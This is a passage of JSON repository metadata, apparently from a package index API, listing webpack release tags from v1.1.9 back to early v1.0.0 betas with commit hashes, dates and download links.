014-05-08T07:35:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9/manifests"},{"name":"v1.1.8","sha":"adf3108a785630cd46daff093a80eb78f507a3a5","kind":"commit","published_at":"2014-04-19T19:36:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8/manifests"},{"name":"v1.1.7","sha":"0ed9c759926ac0f7ec9be10643522657c6b4af53","kind":"commit","published_at":"2014-04-17T07:56:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7/manifests"},{"name":"v1.1.6","sha":"504cb48e8fbd298fc6fa89f4fce99f30f8c072d1","kind":"commit","published_at":"2014-04-17T06:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"32df8b73092c4fb59965f14ff833dfe70ba4940e","kind":"commit","published_at":"2014-04-09T07:12:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5/manifests"},{"name":"v1.1.4","sha":"d6aa7b1388a3fe4b1a3b146a4986bb2b5ea99d03","kind":"commit","published_at":"2014-04-05T16:11:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"5dcf54c1d4885d50625d799625c14123fd412fe1","kind":"commit","published_at":"2014-04-03T17:47:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"fece5aee86748f0f230176aa25d9a7334e91be3d","kind":"commit","published_at":"2014-03-31T09:33:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"67cae9333cd53eb29efd32944961172313d9e49a","kind":"commit","published_at":"2014-03-31T06:50:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"5154409d669d871540b8052c1173244cdc1a1aa1","kind":"commit","published_at":"2014-03-25T09:31:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0/manifests"},{"name":"v1.1.0-beta12","sha":"256baf487179c7dee8254e716cd7f9d0db84842f","kind":"commit","published_at":"2014-03-21T15:22:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12/manifests"},{"name":"v1.1.0-beta11","sha":"8af61319cbe22cb17a406180d94faab54b39a7f6","kind":"commit","published_at":"2014-03-20T07:38:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11/manifests"},{"name":"v1.1.0-beta10","sha":"b1d5ed3dd6f84ee29070795d2b269a2a03a57c57","kind":"commit","published_at":"2014-03-19T21:16:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10/manifests"},{"name":"v1.1.0-beta9","sha":"410c1f5bf82e66b9faaa7dbe2d9b58538c86b0e7","kind":"commit","published_at":"2014-03-18T21:45:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9/manifests"},{"name":"v1.1.0-beta8","sha":"48ace947f915a9388b87119d43afb4e5580c2ed8","kind":"commit","published_at":"2014-03-12T22:03:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8/manifests"},{"name":"v1.1.0-beta7","sha":"06056a40bee6fc843d15b854f6b0c7bacc381ac6","kind":"commit","published_at":"2014-03-12T21:30:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7/manifests"},{"name":"v1.1.0-beta6","sha":"5ab7bf35ae2ad2ba1defe4cee4c5ab46679f1534","kind":"commit","published_at":"2014-03-11T17:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6/manifests"},{"name":"v1.1.0-beta5","sha":"00c11cb7c27dfb416e36cf21200bad0c86cea34c","kind":"commit","published_at":"2014-03-11T15:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5/manifests"},{"name":"v1.1.0-beta4","sha":"8ec37911f52b476f57e75480e642c7932dc43112","kind":"commit","published_at":"2014-03-10T13:00:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4/manifests"},{"name":"v1.1.0-beta3","sha":"4a47a7add67c38faec552ae0e06da7632758c022","kind":"commit","published_at":"2014-03-07T16:08:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3/manifests"},{"name":"v1.1.0-beta2","sha":"65ac850ab7b425a5c2264bd60a91fdf9b1e891ea","kind":"commit","published_at":"2014-03-05T19:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2/manifests"},{"name":"v1.1.0-beta1","sha":"b27540e27bc34809110b180a19a3e56537aeb8df","kind":"commit","published_at":"2014-03-03T14:21:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1/manifests"},{"name":"v1.0.5","sha":"09afa4749babcfc8dd4aa2866b385c27cf00ce59","kind":"commit","published_at":"2014-03-01T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"b88938ceea7f2017723f2baf21d604ce726b2c4a","kind":"commit","published_at":"2014-03-01T12:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"f172af367494f70acdb194adca1624df9bee05c5","kind":"commit","published_at":"2014-02-27T08:20:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3/manifests"},{"name":"v1.0.1","sha":"c5f3bdec73c8efcf0179fe966230c652e8111557","kind":"commit","published_at":"2014-02-24T14:07:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5530e3784dbad2952ce210a7ad4fa5e87b7c14c2","kind":"commit","published_at":"2014-02-19T22:09:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc12","sha":"b1092b01f39e4de332dd63ce0deb51ad2af18bfc","kind":"commit","published_at":"2014-02-15T10:29:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12/manifests"},{"name":"v1.0.0-rc11","sha":"1640c651604417d6169a3cbd0d11ad8f592e2c70","kind":"commit","published_at":"2014-02-14T11:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"4f8ef991f1e7e5256fc061adbd8ba095c84c0d26","kind":"commit","published_at":"2014-02-14T09:07:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"820f304a9a77ae33bbe17d6eaac10595e5434543","kind":"commit","published_at":"2014-02-13T16:32:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"254c81c6afa7ac18030ab4bf3e37ab37ffbf1ea0","kind":"commit","published_at":"2014-02-13T10:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"78810b969193cf153b2f1c56c06d637f10afb6f4","kind":"commit","published_at":"2014-02-12T13:53:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"fa6f328f8210f28153d1cd86e1e7fa2da0e39d57","kind":"commit","published_at":"2014-02-12T08:00:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"7044c7a0f88a3f8645541330a9f235f66526b6ad","kind":"commit","published_at":"2014-02-11T12:30:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc4","sha":"6b7c23fb3181fa118a69ba3e320eb9ff57f249a4","kind":"commit","published_at":"2014-02-11T11:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4/manifests"},{"name":"v1.0.0-rc3","sha":"60684612b21b2f9481073fade5dbf0b0743fe833","kind":"commit","published_at":"2014-02-05T11:37:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"81d90ac4b8860ebb9ab3e5485a804becbd18c1ca","kind":"commit","published_at":"2014-02-05T11:05:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2/manifests"},{"name":"v1.0.0-rc1","sha":"5965a3a96a711629bcde184162c0f25f51da80dc","kind":"commit","published_at":"2014-02-03T17:21:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1/manifests"},{"name":"v1.0.0-beta9","sha":"0752c3bfff32b0a5beca6b8da5f6bd7eb34abd0e","kind":"commit","published_at":"2014-01-31T13:09:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9/manifests"},{"name":"v1.0.0-beta8","sha":"e58f315f321e6535a9ff34a8b87f949919dace01","kind":"commit","published_at":"2014-01-24T12:33:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8/manifests"},{"name":"v1.0.0-beta7","sha":"8be2e5a14ac873b703119362b5c3447eb8e5f60e","kind":"commit","published_at":"2014-01-21T15:25:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7/manifests"},{"name":"v1.0.0-beta6","sha":"a9fc61ff1a22091135f183809fb537a1325e532b","kind":"commit","published_at":"2014-01-10T09:49:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6/manifests"},{"name":"v1.0.0-beta5","sha":"cf45c9cd1cce6e3136894ace4f9ae8618d1211a1","kind":"commit","published_at":"2014-01-08T18:23:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5/manifests"},{"name":"v1.0.0-beta4","sha":"df0f3687db404a87eab75af62504828ce13dd03d","kind":"commit","published_at":"2013-12-29T11:21:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4/manifests"},{"name":"v1.0.0-beta3","sha":"a4c58898ff5395124ac8e2cf79c25095fbe8a98e","kind":"commit","published_at":"2013-12-29T11:11:26.000Z","download_url":"https://codeload.github.com/webpac